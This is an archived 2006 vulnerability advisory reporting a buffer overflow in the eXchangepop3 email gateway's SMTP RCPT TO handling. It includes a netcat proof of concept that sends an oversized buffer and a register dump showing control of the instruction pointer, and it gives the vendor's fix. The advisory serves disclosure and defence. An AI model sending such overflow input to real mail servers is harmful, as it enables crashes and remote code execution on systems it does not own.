what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

exchangepop3.txt

exchangepop3.txt
Posted Feb 4, 2006
Authored by Securma Massine | Site morx.org

The eXchangepop3 email gateway is susceptible to a buffer overflow attack.

tags | advisory, overflow
SHA-256 | e821244a8edad30fc1c760e66f2d57a74970d7f9058fd15ff23c1ad026a38793

exchangepop3.txt

Change Mirror Download

Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org

Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code and gain access on system.

C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
41414141 ?? ???

Affected Software(s):
Exchangepop3 v 5.0 (build 050203)

Affected platform(s):
Windows

Exploit/Proof of Concept:
http://www.morx.org/expl5.txt

Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/

History:
14/01/2006 initial vendor contact
16/01/2006 vendor received details about the vulnerabilty
02/02/2006 vendor released the fixed build

Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.

Greets:
Greets to undisputed and all MorX members.


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close